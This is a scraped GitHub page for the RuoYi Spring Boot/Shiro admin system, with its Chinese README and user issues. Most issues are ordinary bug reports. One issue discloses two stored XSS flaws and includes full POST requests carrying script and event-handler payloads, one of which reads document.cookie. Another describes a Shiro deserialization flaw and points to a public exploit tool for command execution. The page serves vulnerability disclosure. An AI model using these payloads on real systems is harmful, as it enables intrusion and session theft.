lerry903 / ruoyi Goto Github PK

View Code? Open in Web Editor NEW

1.2K 50.0 490.0 12.18 MB

基于SpringBoot2.1的权限管理系统易读易懂、界面简洁美观。核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用

Home Page: http://www.ruoyi.vip

License: Apache License 2.0

Java 99.99% Dockerfile 0.01%

spring-boot shiro mybatis swagger2 hutool druid-spring-boot-starter

ruoyi's Introduction

平台简介

一直想做一款后台管理系统，看了很多优秀的开源项目但是发现没有合适的。于是利用空闲休息时间开始自己写了一套后台系统。如此有了若依。她可以用于所有的Web应用程序，如网站管理后台，网站会员中心，CMS，CRM，OA。所有前端后台代码封装过后十分精简易上手，出错概率低。同时支持移动客户端访问。系统会陆续更新一些实用功能。

寓意：你若不离不弃，我必生死相依

内置功能

用户管理：用户是系统操作者，该功能主要完成系统用户配置。
部门管理：配置系统组织机构（公司、部门、小组），树结构展现支持数据权限。
岗位管理：配置系统用户所属担任职务。
菜单管理：配置系统菜单，操作权限，按钮权限标识等。
角色管理：角色菜单权限分配、设置角色按机构进行数据范围权限划分。
字典管理：对系统中经常使用的一些较为固定的数据进行维护。
参数管理：对系统动态配置常用参数。
通知公告：系统通知公告信息发布维护。
操作日志：系统正常操作日志记录和查询；系统异常信息日志记录和查询。
登录日志：系统登录日志记录查询包含登录异常。
在线用户：当前系统中活跃用户状态监控。
定时任务：在线（添加、修改、删除)任务调度包含执行结果日志。
代码生成：前后端代码的生成（java、html、xml、sql)支持CRUD下载。
系统接口：根据业务代码自动生成相关的api接口文档。
在线构建器：拖动表单元素生成相应的HTML代码。
连接池监视：监视当期系统数据库连接池状态，可进行分析SQL找出系统性能瓶颈。
服务监控：监视当前系统CPU、内存、磁盘、堆栈等相关信息。

源码托管

Github | Gitee

在线体验

admin/admin123

演示地址：http://ruoyi.vip

文档地址：http://doc.ruoyi.vip

演示图

License

用户在遵循本项目协议的同时，如果用户下载、安装、使用本项目中所提供的软件，软件作者对任何原因在使用本项目中提供的软件时可能对用户自己或他人造成的任何形式的损失和伤害不承担任何责任。作者有权根据有关法律、法规的变化修改本项目协议。修改后的协议会随附于本项目的新版本中。当发生有关争议时，以最新的协议文本为准。如果用户不同意改动的内容，用户可以自行删除本项目。如果用户继续使用本项目，则视为您接受本协议的变动。

感谢大家 Star & Fork 的支持。

ruoyi's People

Contributors

Stargazers

Watchers

Forkers

liutengfei123 jcookies crazyshare winmin86 xumingfei yunshitiger liupeng110112 wangzbing yanqiuqiu andy521 bnmyni innocence-y lwuuu jordonzhu balzaron wfq01 jessicacherish himoutoumaru erik5169 xtonghot 929359291 scarfaceyang fxiaonan lovezhike hisoka123 kv2014 hhy5277 zhangxw425 liueast xinfz la1995 pikejun xieyang313 wanghuiyao hellnxue hsongx ruanfeixiong comingcn2014 netwolf712 luonaibin lidujuan eggbucket thinksee alihock yach007 diffblue-benchmarks shawn2046 huangjian811 gonnana moocstudent 923325596 85668869 zhonglh 979236867 lilu54321 wmktz1 lwneighbor z1019918452 tbehappy xutaowin vernezhong fi3estudy tgy616 jackyxian daniel-chen404 jiandanfeng janloong-doo hardermen daodaoguang zol1006 dacer250 dappnbs heyu9258 joebeckham 914423503 karthurl smudkey 942435655 shaolin-liu nivenqi happyminchao muker-yng yidardd qqjgalaxy yuanjkkang tong2 yyxiao toryren breezelk 435732793 dwjisaboy hejun5448 lukysmile lkemin lynn831 mystartdream dewey00 everestjoo jhhe66 budding888

ruoyi's Issues

quartz :SysJobServiceImpl 初始化时缺少事务

参考：
https://stackoverflow.com/questions/17346679/transactional-on-postconstruct-method

排序工具类isAsc初值未设置成功

多线程时 shiro session 与 springboot内置Tomcat session 的cookie名冲突

在使用多线程的过程中，偶尔会出现报错：
org.apache.shiro.session.UnknownSessionException: There is no session with id [800e3201-637e-4c7b-988a-b73dc7b13d4b]
用户其他功能是正常使用的，维度多线程时错误。
ShiroConfig 类是否设置shiro session的cookie 名

在二级路由下添加三级路由

在二级路由页面有一个点击查看详情进入三级路由界面，如何添加路由，并且不在侧边导航栏上显示，且面包屑会记录上一级路由

There is two XSS vulnerability

After the administrator logged in, open the following page
system management->Notice notice
Then add the following XSS statement to the announcement title
poc: ”><sCript>alertxss</SCript>
there is post package:

POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close

noticeId=10&noticeTitle=%E2%80%9D%3E%3CsCript%3Ealert%60xss%60%3C%2FSCript%3E&noticeType=1&noticeContent=%3Cp%3E%E2%80%9D%26gt%3B%26lt%3BsCript%26gt%3Balert%60xss%60%26lt%3B%2FSCript%26gt%3B%3Cbr%3E%3C%2Fp%3E&status=0&=

After the administrator logged in, open the following page
System tools->code generation
Then click Import, select any one and click OK. Then click Edit, click basic information, and enter the following XSS statement in the column of table name
poc2:')" onmousemove=alert(document.cookie) a=(1
there is post package:

POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close

tableId=1&tableName=')%22+onmousemove%3Dalert(document.cookie)+a%3D(1&tableComment=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A%E8%A1%A8&className=SysNotice&functionAuthor=ruoyi&remark=&columns%5B0%5D.columnId=1&columns%5B0%5D.sort=1&columns%5B0%5D.columnComment=%E5%85%AC%E5%91%8AID&columns%5B0%5D.javaType=Integer&columns%5B0%5D.javaField=noticeId&columns%5B0%5D.isInsert=1&columns%5B0%5D.queryType=EQ&columns%5B0%5D.htmlType=input&columns%5B0%5D.dictType=&columns%5B1%5D.columnId=2&columns%5B1%5D.sort=2&columns%5B1%5D.columnComment=%E5%85%AC%E5%91%8A%E6%A0%87%E9%A2%98&columns%5B1%5D.javaType=String&columns%5B1%5D.javaField=noticeTitle&columns%5B1%5D.isInsert=1&columns%5B1%5D.isEdit=1&columns%5B1%5D.isList=1&columns%5B1%5D.isQuery=1&columns%5B1%5D.queryType=EQ&columns%5B1%5D.isRequired=1&columns%5B1%5D.htmlType=input&columns%5B1%5D.dictType=&columns%5B2%5D.columnId=3&columns%5B2%5D.sort=3&columns%5B2%5D.columnComment=%E5%85%AC%E5%91%8A%E7%B1%BB%E5%9E%8B%EF%BC%881%E9%80%9A%E7%9F%A5+2%E5%85%AC%E5%91%8A%EF%BC%89&columns%5B2%5D.javaType=String&columns%5B2%5D.javaField=noticeType&columns%5B2%5D.isInsert=1&columns%5B2%5D.isEdit=1&columns%5B2%5D.isList=1&columns%5B2%5D.isQuery=1&columns%5B2%5D.queryType=EQ&columns%5B2%5D.isRequired=1&columns%5B2%5D.htmlType=select&columns%5B2%5D.dictType=&columns%5B3%5D.columnId=4&columns%5B3%5D.sort=4&columns%5B3%5D.columnComment=%E5%85%AC%E5%91%8A%E5%86%85%E5%AE%B9&columns%5B3%5D.javaType=String&columns%5B3%5D.javaField=noticeContent&columns%5B3%5D.isInsert=1&columns%5B3%5D.isEdit=1&columns%5B3%5D.isList=1&columns%5B3%5D.isQuery=1&columns%5B3%5D.queryType=EQ&columns%5B3%5D.htmlType=summernote&columns%5B3%5D.dictType=&columns%5B4%5D.columnId=5&columns%5B4%5D.sort=5&columns%5B4%5D.columnComment=%E5%85%AC%E5%91%8A%E7%8A%B6%E6%80%81%EF%BC%880%E6%AD%A3%E5%B8%B8+1%E5%85%B3%E9%97%AD%EF%BC%89&columns%5B4%5D.javaType=String&columns%5B4%5D.javaField=status&columns%5B4%5D.isInsert=1&columns%5B4%5D.isEdit=1&columns%5B4%5D.isList=1&columns%5B4%5D.isQuery=1&columns%5B4%5D.queryType=EQ&columns%5B4%5D.htmlType=radio&columns%5B4%5D.dictType=&columns%5B5%5D.columnId=6&columns%5B5%5D.sort=6&columns%5B5%5D.columnComment=%E5%88%9B%E5%BB%BA%E8%80%85&columns%5B5%5D.javaType=String&columns%5B5%5D.javaField=createBy&columns%5B5%5D.isInsert=1&columns%5B5%5D.queryType=EQ&columns%5B5%5D.htmlType=input&columns%5B5%5D.dictType=&columns%5B6%5D.columnId=7&columns%5B6%5D.sort=7&columns%5B6%5D.columnComment=%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4&columns%5B6%5D.javaType=Date&columns%5B6%5D.javaField=createTime&columns%5B6%5D.isInsert=1&columns%5B6%5D.queryType=EQ&columns%5B6%5D.htmlType=datetime&columns%5B6%5D.dictType=&columns%5B7%5D.columnId=8&columns%5B7%5D.sort=8&columns%5B7%5D.columnComment=%E6%9B%B4%E6%96%B0%E8%80%85&columns%5B7%5D.javaType=String&columns%5B7%5D.javaField=updateBy&columns%5B7%5D.isInsert=1&columns%5B7%5D.isEdit=1&columns%5B7%5D.queryType=EQ&columns%5B7%5D.htmlType=input&columns%5B7%5D.dictType=&columns%5B8%5D.columnId=9&columns%5B8%5D.sort=9&columns%5B8%5D.columnComment=%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4&columns%5B8%5D.javaType=Date&columns%5B8%5D.javaField=updateTime&columns%5B8%5D.isInsert=1&columns%5B8%5D.isEdit=1&columns%5B8%5D.queryType=EQ&columns%5B8%5D.htmlType=datetime&columns%5B8%5D.dictType=&columns%5B9%5D.columnId=10&columns%5B9%5D.sort=10&columns%5B9%5D.columnComment=%E5%A4%87%E6%B3%A8&columns%5B9%5D.javaType=String&columns%5B9%5D.javaField=remark&columns%5B9%5D.isInsert=1&columns%5B9%5D.isEdit=1&columns%5B9%5D.isList=1&columns%5B9%5D.queryType=EQ&columns%5B9%5D.htmlType=input&columns%5B9%5D.dictType=&tplCategory=crud&packageName=com.ruoyi.system&moduleName=system&businessName=notice&functionName=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A&params%5BparentMenuId%5D=&params%5BparentMenuName%5D=&genType=0&genPath=%2F&subTableName=&params%5BtreeCode%5D=&params%5BtreeParentCode%5D=&params%5BtreeName%5D=

Wrong code modification leads to Shiro deserialization vulnerability

The cause of the vulnerability
The project uses shiro1.7.0 version, this version should not have this vulnerability;

Code layer troubleshooting:

The default key is used (one of the reasons for this vulnerability)
From the point of view of the exploited gadget, the commonscollection exploit chain is used (the second reason for this vulnerability), and the commons-collections vulnerability should use version 3.2.2 and above
Check shiro related calling code:

The Shiro deserialization vulnerability is caused by calling the getRememberedSerializedIdentity() function of the CookieRememberMeManager class. The official repair code is as follows, the repair plan is to delete the CookieRememberMeManager class

The CookieRememberMeManager class was added when the open source project was rewritten, which led to the generation of vulnerabilities.

Exploit：
You can use the following tools to exploit this vulnerability, Github project: https://github.com/j1anFen/shiro_attack

Execute system commands

前端项目在哪里

前端项目在哪里，文档里没看到

多环境org.quartz-scheduler配置问题

我们开发环境和测试环境用的数据库是一起的，但是开发环境的定时器有时候会和测试环境的定时器一起运行，导致出现一些问题，通过百度搜索，用scheduling.enabled=false配置在配置文件上也是没有生效的，有没有什么好的办法解决多环境定时器共同运行的问题

后端接口跨域

博主的后端服务是否支持跨域访问呢？

我想问问@Excel的注解怎么实现当前导出的列名位于EXCEL文档的最后？

目前出现的情况是remark一旦加上@Excel就会出现列名位于EXCEL的第一列，求大神赐教学习

新增用户保存时，一直出现正在处理中，请稍后，其实保存是成功的

ry-ui.js?v=4.0.0:1027 Uncaught TypeError: Cannot read property 'contentWindow' of undefined
at Object.successTabCallback (ry-ui.js?v=4.0.0:1027)
at Object.success (ry-ui.js?v=4.0.0:968)
at j (jquery.min.js:2)
at Object.fireWith [as resolveWith] (jquery.min.js:2)
at x (jquery.min.js:4)
at XMLHttpRequest. (jquery.min.js:4)

bootstrap table 双击编辑时报错

function queryUserList() {

    var options = {
        url: prefix + "/list",
        createUrl: prefix + "/add",
        updateUrl: prefix + "/edit/{id}",
        removeUrl: prefix + "/remove",
        exportUrl: prefix + "/export",
        modalName: "监控-字典对应",
        showExport: false,
        pagination: false,
        sortName: 'srot',
		sortOrder: 'asc',
        striped: true,
        showRefresh: false,
        uniqueId:"id",
        //onDblClickCell: onDblClickCell,
        onDblClickCell: onDblClickCell,

        columns: [{
            checkbox: false
        },
            {
                field : 'id',
                title : '',
                visible: false
            },
            {
                field : 'xmmc',
                title : '项目名称',
                sortable: true
            },
            {
                field : 'xmbm',
                title : '项目编码',
                sortable: true
            },
            {
                field : 'zdmc',
                title : '字段名称',
                sortable: true
            },
            {
                field : 'zdbm',
                title : '字典编码',
                sortable: true
            },
            {
                field : 'dyzdmc',
                title : '对应字段名称',
                sortable: true
            },
            {
                field : 'dyzdbm',
                title : '对应字段编码',
                sortable: true
            },
            {
                title: '操作',
                align: 'center',
                formatter: function(value, row, index) {
                    var actions = [];
                    // actions.push('<a class="btn btn-success btn-xs ' + editFlag + '" href="javascript:void(0)" onclick="$.operate.edit(\'' + row.id + '\')"><i class="fa fa-edit"></i>编辑</a> ');
                    // actions.push('<a class="btn btn-danger btn-xs ' + removeFlag + '" href="javascript:void(0)" onclick="$.operate.remove(\'' + row.id + '\')"><i class="fa fa-remove"></i>删除</a>');
					var aStr1 = "<a onclick='syncClick(" + index + "," + row.id +")'><i class=\"fa fa-edit\"></i>同步</a>&nbsp;&nbsp;";
					var aStr = "<a onclick='addDy(" + index + "," + row.id +")'>新增对应关系</a>&nbsp;&nbsp;";
                    var aStr2="";
                    if(row.sfxzdygx!='1'){
                        var aStr2 = "<a onclick='del(" + index + "," + row.id +")' shiro:hasPermission=\"system:tEhrJkZddy:remove\">删除</a>"
					}
					//actions.push('<a onclick="addDy(\'' + tEhrJkMain, '\' + \'' + row.id + '\')">新增对应关系</a>')
					actions.push(aStr1);
					actions.push(aStr);
					actions.push(aStr2);
                    return actions.join('');
                }
            }
            ]
    };
    $.table.init(options);
}

function onDblClickCell(field, value, row, $element){
$.operate.edit(row.id);
}

/**
 * @param {点击列的 field 名称} field
 * @param {点击列的 value 值} value
 * @param {点击列的整行数据} row
 * @param {td 元素} $element
 */
function onDblClickCell(field, value, row, $element) {
    if(field == 'dyzdmc' || field == 'dyzdbm') {
        $element.attr('contenteditable', true);
        $element.blur(function () {
            var index = $element.parent().data('index');
            var tdValue = $element.html();

            saveData(index, field, tdValue, row);
        })
    }else{
        $.modal.alertError('只能修改对应字段名称和对应字段编码');
	}
}

二级菜单点击失效

Describe the bug （描述 Bug）

二级菜单点击失效，我搞了一晚上了，求助！！！

A clear and concise description of what the bug is.

我在项目里写了一个商城公共头，并没有使用后台的东西，后台也没有引用我的东西。
这些都不是关键，关键是我按照代码规范写了一个api，

import { getShopUserInfo, getAllCount } from '@/api/shopCommon'

这样导入之后代码可以运行，没有报错，也能从后台拿到数据。
但是这行代码却影响到了后台的二级菜单，点击失效。
一级菜单却没有失效，点击可以显示内容。
我百思不得其解，路由从头看了个遍，也没有看出个头头来。

To Reproduce （重现步骤）

Steps to reproduce the behavior:

详细代码如下略有删减，以便检查

/src/views/Shop/GloabalHeader/GloabalHeader.vue

import { userInfo, allCount } from '@/api/shop/common'
export default {
  name: 'GlobalHeader',
  methods: {
    async getUserInfo () {
      await userInfo().then(res => {
        const location = res.data.loginIp
        const name = res.data.userName
        const depart = res.data.deptName
        this.location = location
        this.name = name
        this.depart = depart
      })
    },
    async refreshAllCount () {
      await allCount().then(res=>{
        const myselectCount = res.data.myselectCount
        const myRecomCount = res.data.myRecomCount
        const myOrderFormCount = res.data.myOrderFormCount
        const mySubscribeCount = res.data.mySubscribeCount
        this.myselectCount = myselectCount
        this.myRecomCount = myRecomCount
        this.myOrderFormCount = myOrderFormCount
        this.mySubscribeCount = mySubscribeCount
      })
    }
  }
}

/src/views/Shop/GloabalHeader/index.js

import GlobalHeader from './GlobalHeader'
export default GlobalHeader

/src/api/shop/common.js

import { shopAxios } from '@/utils/request'
const api = {
  userInfo:"/shop/index/loginUserInfo",
  allCount:'/shop/index/allCount'
}
export function userInfo(){
	return shopAxios({
		url:api.userInfo,
		method:'get'
	})
}
export function allCount(){
	return shopAxios({
		url:api.allCount,
		method:'get'
	})
}